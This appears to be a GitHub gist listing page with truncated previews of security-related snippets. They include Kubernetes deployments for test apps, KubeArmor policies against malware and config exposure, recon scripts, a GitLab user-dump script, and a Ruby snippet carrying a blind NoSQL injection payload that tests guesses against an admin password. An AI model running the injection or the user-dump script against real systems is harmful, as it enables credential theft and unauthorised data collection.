This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: apps/v1 | |
kind: Deployment | |
metadata: | |
name: tinyfilemanager | |
labels: | |
app: tinyfilemanager | |
spec: | |
selector: | |
matchLabels: | |
app: tinyfilemanager |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### | |
# Dumps GitLab's user base to CSV form. | |
# | |
# Requires GraphqlClient: pip install python-graphql-client | |
### | |
from python_graphql_client import GraphqlClient | |
import json | |
import sys | |
import argparse |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apt update | |
apt -y upgrade | |
apt install -y sudo nano wget unzip make gcc curl gawk python ufw net-tools default-jre ca-certificates gnupg lsb-release iptables-persistent | |
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg | |
echo \ | |
"deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \ | |
$(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null | |
apt-get update | |
apt-get install -y docker-ce docker-ce-cli containerd.io | |
cd /var/tmp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# KubeArmor is an open source software that enables you to protect your cloud workload at run-time. | |
# To learn more about KubeArmor visit: | |
# https://www.accuknox.com/kubearmor | |
apiVersion: security.kubearmor.com/v1 | |
kind: KubeArmorPolicy | |
metadata: | |
name: ksp-xanthe-malware | |
spec: | |
tags: ["xanthe", "abcbot", "cryptomining"] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: security.kubearmor.com/v1 | |
kind: KubeArmorPolicy | |
metadata: | |
name: ksp-zend-conf-block | |
spec: | |
message: Permission denied | |
tags : ["config","exposure","zend","php"] | |
selector: | |
matchLabels: | |
app: zend |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: apps/v1 | |
kind: Deployment | |
metadata: | |
creationTimestamp: null | |
labels: | |
app: ubuntu | |
name: ubuntu | |
spec: | |
replicas: 1 | |
selector: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: apps/v1 | |
kind: Deployment | |
metadata: | |
name: coldfusion | |
labels: | |
app: coldfusion | |
spec: | |
selector: | |
matchLabels: | |
app: coldfusion |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'httparty' | |
URL="--url-here--" | |
def check?(str) | |
resp = HTTParty.get("http://#{URL}/?search=admin%27%20%26%26%20this.password.match(/#{str}/)%00") | |
return resp.body =~ />admin</ | |
end | |
#puts check?("d").inspect |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Combination of Multiple Tools for Personal Use by @nk1202 . | |
#!/bin/bash | |
url=$1 | |
if [ ! -d "output/$url" ];then | |
mkdir output/$url | |
fi | |
if [ ! -d "output/$url/recon" ];then |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Combinination of Subdomain Enumeration Tools for Personal Use by @nk1202 . | |
#!/bin/bash | |
url=$1 | |
if [ ! -d "output/$url" ];then | |
mkdir output/$url | |
fi | |
if [ ! -d "output/$url/recon" ];then | |
mkdir output/$url/recon | |
fi |